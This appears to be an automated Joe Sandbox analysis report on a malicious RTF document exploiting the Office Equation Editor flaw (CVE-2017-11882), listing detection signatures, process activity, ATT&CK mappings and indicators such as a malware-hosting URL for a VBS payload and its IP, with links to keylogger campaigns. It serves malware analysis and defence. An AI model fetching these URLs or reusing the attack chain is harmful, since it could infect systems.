Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DwocLrf8iK.rtf

Overview

General Information

Sample name:DwocLrf8iK.rtf
renamed because original name is a hash value
Original sample name:a02d2abb1a7da0921aa1fa2d4ae713062b16cda330e9755556c2950f7e413398.rtf
Analysis ID:1568170
MD5:f11a6a0e8ae4ccc1c4a311e48b8f464e
SHA1:6bcd811bf12fa142a18f9710a7b24334530c0807
SHA256:a02d2abb1a7da0921aa1fa2d4ae713062b16cda330e9755556c2950f7e413398
Tags:bklpyseyeut4impw50n1rtfuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Document exploit detected (process start blacklist hit)
Office equation editor establishes network connection
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3636 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3716 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • EQNEDT32.EXE (PID: 3976 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
DwocLrf8iK.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2105:$obj2: \objdata
  • 0x211a:$obj3: \objupdate

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 5.182.211.149, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3716, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3716, Protocol: tcp, SourceIp: 5.182.211.149, SourceIsIpv6: false, SourcePort: 80
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3716, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3636, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://sbv.pushswroller.eu/tes/jukhccby.vbsjAvira URL Cloud: Label: malware
Source: http://sbv.pushswroller.eu/tes/jukhccby.vbsHAvira URL Cloud: Label: malware
Source: http://sbv.pushswroller.eu/tes/jukhccby.vbsAvira URL Cloud: Label: malware
Source: DwocLrf8iK.rtfReversingLabs: Detection: 52%

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 5.182.211.149 Port: 80Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global trafficDNS query: name: sbv.pushswroller.eu
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.182.211.149:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.182.211.149:80
Source: global trafficTCP traffic: 5.182.211.149:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.182.211.149:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.182.211.149:80
Source: global trafficTCP traffic: 5.182.211.149:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 5.182.211.149:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.182.211.149:80
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.182.211.149:80
Source: global trafficTCP traffic: 5.182.211.149:80 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.182.211.149:80
Source: Joe Sandbox ViewASN Name: SKB-ENTERPRISENL SKB-ENTERPRISENL
Source: global trafficHTTP traffic detected: GET /tes/jukhccby.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sbv.pushswroller.euConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B1CD360A-A8A5-454D-A1AC-E4C35B1B92FE}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /tes/jukhccby.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sbv.pushswroller.euConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: sbv.pushswroller.eu
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 04 Dec 2024 11:16:58 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: Keep-AliveData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.356535956.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sbv.pushswroller.eu/tes/jukhccby.vbs
Source: EQNEDT32.EXE, 00000002.00000002.356535956.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sbv.pushswroller.eu/tes/jukhccby.vbsH
Source: EQNEDT32.EXE, 00000002.00000002.356535956.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sbv.pushswroller.eu/tes/jukhccby.vbsj

System Summary

barindex
Source: DwocLrf8iK.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: DwocLrf8iK.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: classification engineClassification label: mal84.expl.winRTF@3/7@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ocLrf8iK.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6F74.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: DwocLrf8iK.rtfReversingLabs: Detection: 52%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wdi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: duser.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: DwocLrf8iK.LNK.0.drLNK file: ..\..\..\..\..\Desktop\DwocLrf8iK.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEAutomated click: OK
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006701F4 push eax; retf 2_2_006701F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0067C3F0 push A00067C4h; ret 2_2_0067C3F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00678F54 push 50000103h; retf 2_2_00678F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0067C2DC pushad ; retn 0067h2_2_0067C2DD
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3736Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3884Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3996Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts23
Exploitation for Client Execution
1
DLL Side-Loading
1
Process Injection
1
Masquerading
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System3
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media13
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager3
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive4
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DwocLrf8iK.rtf53%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://sbv.pushswroller.eu/tes/jukhccby.vbsj100%Avira URL Cloudmalware
http://sbv.pushswroller.eu/tes/jukhccby.vbsH100%Avira URL Cloudmalware
http://sbv.pushswroller.eu/tes/jukhccby.vbs100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
sbv.pushswroller.eu
5.182.211.149
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://sbv.pushswroller.eu/tes/jukhccby.vbstrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://sbv.pushswroller.eu/tes/jukhccby.vbsjEQNEDT32.EXE, 00000002.00000002.356535956.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    http://sbv.pushswroller.eu/tes/jukhccby.vbsHEQNEDT32.EXE, 00000002.00000002.356535956.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    5.182.211.149
    sbv.pushswroller.euNetherlands
    64425SKB-ENTERPRISENLtrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1568170
    Start date and time:2024-12-04 12:16:06 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 20s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:9
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:DwocLrf8iK.rtf
    renamed because original name is a hash value
    Original Sample Name:a02d2abb1a7da0921aa1fa2d4ae713062b16cda330e9755556c2950f7e413398.rtf
    Detection:MAL
    Classification:mal84.expl.winRTF@3/7@1/1
    EGA Information:Failed
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .rtf
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Active ActiveX Object
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3716 because there are no executed function
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: DwocLrf8iK.rtf
    TimeTypeDescription
    06:16:54API Interceptor326x Sleep call for process: EQNEDT32.EXE modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    5.182.211.149173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • the.drillmmcsnk.top/den/P4.php
    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • sbv.pushswroller.eu/gfy/gesr.txt
    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
    • the.drillmmcsnk.top/den/P4.php
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    sbv.pushswroller.euDoc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 5.182.211.149
    ConfirmaciXnXdeXfacturaXPedidoXadicional.docGet hashmaliciousUnknownBrowse
    • 141.98.10.88
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    SKB-ENTERPRISENL173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 5.182.211.149
    Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
    • 5.182.211.149
    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
    • 5.182.211.149
    bot_library.exeGet hashmaliciousUnknownBrowse
    • 45.148.121.112
    bot_library.exeGet hashmaliciousUnknownBrowse
    • 45.148.121.112
    i3LQkjkqOB.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 45.148.121.112
    grjD7lWffX.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 45.148.121.112
    systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
    • 45.148.120.142
    systemd-udevd (deleted)Get hashmaliciousUnknownBrowse
    • 45.148.120.142
    configs.confGet hashmaliciousUnknownBrowse
    • 45.148.120.142
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:CE338FE6899778AACFC28414F2D9498B
    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):16896
    Entropy (8bit):3.586566405359145
    Encrypted:false
    SSDEEP:384:H037BLyvvlg8QC4LwYEKbzmYTQdBH+kyxJZJYqlpUl8S93t3wppmRg:4UlhKLthPmYTQSxZmqlpUpVwpGg
    MD5:B99BB67739F5941819E4E7A0E1640667
    SHA1:DCBF5A33D4845E66EE31301AF9995CB55CB03AA8
    SHA-256:5C1DDCB967EC4E2C6EBC09A360913646C14CA8DE3AD502E2FE8CE8A51A89BCEE
    SHA-512:047ACA11448636801C1620B55C689990F9DCEBE9B894F17033B664DA73F00C48B76596C8BA3DD54121410D9B7185B0F2B707DA4C9F9E6CC0D2A367835C69F97C
    Malicious:false
    Reputation:low
